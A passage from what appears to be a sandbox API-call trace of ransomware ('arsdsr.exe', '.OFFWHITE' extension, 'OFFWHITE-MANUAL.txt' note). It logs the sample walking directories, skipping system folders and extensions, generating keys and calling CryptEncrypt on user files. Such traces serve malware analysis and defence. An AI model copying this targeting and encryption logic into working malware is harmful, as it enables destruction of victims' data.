Size=0x10) returned 0x5313f8 [0144.035] GetProcessHeap () returned 0x500000 [0144.035] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531410 [0144.035] GetProcessHeap () returned 0x500000 [0144.035] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55cc00 [0144.035] GetProcessHeap () returned 0x500000 [0144.035] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55cd08 [0144.035] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.035] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.035] SystemFunction036 (in: RandomBuffer=0x5313f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5313f8) returned 1 [0144.035] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.035] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.035] SystemFunction036 (in: RandomBuffer=0x531410, RandomBufferLength=0x10 | out: RandomBuffer=0x531410) returned 1 [0144.035] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.035] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.036] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55cc00*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55cc00*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.036] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.036] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.036] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55cd08*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55cd08*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.036] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.036] SetLastError (dwErrCode=0x0) [0144.036] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55cc00, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.036] GetLastError () returned 0x6 [0144.036] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0c6929, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0c6929, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="superbar.png", cAlternateFileName="")) returned 0 [0144.036] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0144.037] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0144.037] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2=".") returned 1 [0144.037] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="..") returned 1 [0144.038] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="...") returned 1 [0144.038] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="windows") returned -1 [0144.038] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="$recycle.bin") returned 1 [0144.038] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="rsa") returned -1 [0144.038] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="ntuser.dat") returned -1 [0144.038] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="programdata") returned -1 [0144.038] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="appdata") returned -1 [0144.038] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="program files") returned -1 [0144.038] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="program files (x86)") returned -1 [0144.038] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\" [0144.038] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\", lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0144.038] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" [0144.038] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" [0144.038] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0144.038] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0144.038] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.038] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0144.039] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.039] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.039] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0af2f7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x9c0af2f7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x9c0af2f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="background.png", cAlternateFileName="")) returned 1 [0144.039] lstrcmpiW (lpString1="background.png", lpString2=".") returned 1 [0144.039] lstrcmpiW (lpString1="background.png", lpString2="..") returned 1 [0144.039] lstrcmpiW (lpString1="background.png", lpString2="...") returned 1 [0144.039] lstrcmpiW (lpString1="background.png", lpString2="windows") returned -1 [0144.039] lstrcmpiW (lpString1="background.png", lpString2="$recycle.bin") returned 1 [0144.039] lstrcmpiW (lpString1="background.png", lpString2="rsa") returned -1 [0144.039] lstrcmpiW (lpString1="background.png", lpString2="ntuser.dat") returned -1 [0144.039] lstrcmpiW (lpString1="background.png", lpString2="programdata") returned -1 [0144.039] lstrcmpiW (lpString1="background.png", lpString2="appdata") returned 1 [0144.039] lstrcmpiW (lpString1="background.png", lpString2="program files") returned -1 [0144.039] lstrcmpiW (lpString1="background.png", lpString2="program files (x86)") returned -1 [0144.039] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" [0144.039] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="background.png" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" [0144.039] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.039] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.039] PathFindExtensionW (pszPath="background.png") returned=".png" [0144.039] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0144.039] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0144.039] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0144.039] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0144.039] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0144.039] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0144.040] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0144.040] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0144.040] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0144.040] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0144.040] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0144.040] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0144.040] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0144.040] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0144.040] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0144.040] lstrcmpiW (lpString1="background.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.040] GetProcessHeap () returned 0x500000 [0144.040] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e810 [0144.040] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.040] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.040] GetProcessHeap () returned 0x500000 [0144.040] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531428 [0144.040] GetProcessHeap () returned 0x500000 [0144.040] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531440 [0144.040] GetProcessHeap () returned 0x500000 [0144.040] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55ce10 [0144.040] GetProcessHeap () returned 0x500000 [0144.041] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55cf18 [0144.041] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.041] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.041] SystemFunction036 (in: RandomBuffer=0x531428, RandomBufferLength=0x10 | out: RandomBuffer=0x531428) returned 1 [0144.041] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.041] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.041] SystemFunction036 (in: RandomBuffer=0x531440, RandomBufferLength=0x10 | out: RandomBuffer=0x531440) returned 1 [0144.041] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.041] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.041] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55ce10*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55ce10*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.041] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.041] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.041] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55cf18*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55cf18*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.041] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.042] SetLastError (dwErrCode=0x0) [0144.042] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55ce10, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.042] GetLastError () returned 0x6 [0144.042] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2feb941, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2feb941, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0144.042] lstrcmpiW (lpString1="behavior.xml", lpString2=".") returned 1 [0144.042] lstrcmpiW (lpString1="behavior.xml", lpString2="..") returned 1 [0144.042] lstrcmpiW (lpString1="behavior.xml", lpString2="...") returned 1 [0144.042] lstrcmpiW (lpString1="behavior.xml", lpString2="windows") returned -1 [0144.042] lstrcmpiW (lpString1="behavior.xml", lpString2="$recycle.bin") returned 1 [0144.042] lstrcmpiW (lpString1="behavior.xml", lpString2="rsa") returned -1 [0144.042] lstrcmpiW (lpString1="behavior.xml", lpString2="ntuser.dat") returned -1 [0144.042] lstrcmpiW (lpString1="behavior.xml", lpString2="programdata") returned -1 [0144.042] lstrcmpiW (lpString1="behavior.xml", lpString2="appdata") returned 1 [0144.042] lstrcmpiW (lpString1="behavior.xml", lpString2="program files") returned -1 [0144.042] lstrcmpiW (lpString1="behavior.xml", lpString2="program files (x86)") returned -1 [0144.042] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" [0144.043] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="behavior.xml" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" [0144.043] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.043] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.043] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0144.043] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0144.043] lstrcmpiW (lpString1="behavior.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.043] GetProcessHeap () returned 0x500000 [0144.043] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e820 [0144.043] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.044] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.044] GetProcessHeap () returned 0x500000 [0144.044] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531458 [0144.044] GetProcessHeap () returned 0x500000 [0144.044] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531530 [0144.044] GetProcessHeap () returned 0x500000 [0144.044] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55d020 [0144.044] GetProcessHeap () returned 0x500000 [0144.044] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55d128 [0144.044] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.044] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.044] SystemFunction036 (in: RandomBuffer=0x531458, RandomBufferLength=0x10 | out: RandomBuffer=0x531458) returned 1 [0144.044] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.044] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.044] SystemFunction036 (in: RandomBuffer=0x531530, RandomBufferLength=0x10 | out: RandomBuffer=0x531530) returned 1 [0144.044] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.044] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.044] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55d020*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55d020*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.045] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.045] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.045] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55d128*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55d128*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.045] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.045] SetLastError (dwErrCode=0x0) [0144.045] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55d020, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.045] GetLastError () returned 0x6 [0144.045] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0144.045] lstrcmpiW (lpString1="watermark.png", lpString2=".") returned 1 [0144.045] lstrcmpiW (lpString1="watermark.png", lpString2="..") returned 1 [0144.045] lstrcmpiW (lpString1="watermark.png", lpString2="...") returned 1 [0144.045] lstrcmpiW (lpString1="watermark.png", lpString2="windows") returned -1 [0144.045] lstrcmpiW (lpString1="watermark.png", lpString2="$recycle.bin") returned 1 [0144.045] lstrcmpiW (lpString1="watermark.png", lpString2="rsa") returned 1 [0144.045] lstrcmpiW (lpString1="watermark.png", lpString2="ntuser.dat") returned 1 [0144.045] lstrcmpiW (lpString1="watermark.png", lpString2="programdata") returned 1 [0144.045] lstrcmpiW (lpString1="watermark.png", lpString2="appdata") returned 1 [0144.045] lstrcmpiW (lpString1="watermark.png", lpString2="program files") returned 1 [0144.045] lstrcmpiW (lpString1="watermark.png", lpString2="program files (x86)") returned 1 [0144.045] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\" [0144.046] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpString2="watermark.png" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" [0144.046] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.046] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.046] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0144.046] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0144.046] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0144.046] lstrcmpiW (lpString1="watermark.png", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.046] GetProcessHeap () returned 0x500000 [0144.046] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e830 [0144.046] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.047] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.047] GetProcessHeap () returned 0x500000 [0144.047] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531548 [0144.047] GetProcessHeap () returned 0x500000 [0144.047] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531560 [0144.047] GetProcessHeap () returned 0x500000 [0144.047] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55d230 [0144.047] GetProcessHeap () returned 0x500000 [0144.047] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55d338 [0144.047] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.047] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.047] SystemFunction036 (in: RandomBuffer=0x531548, RandomBufferLength=0x10 | out: RandomBuffer=0x531548) returned 1 [0144.047] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.047] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.047] SystemFunction036 (in: RandomBuffer=0x531560, RandomBufferLength=0x10 | out: RandomBuffer=0x531560) returned 1 [0144.047] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.047] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 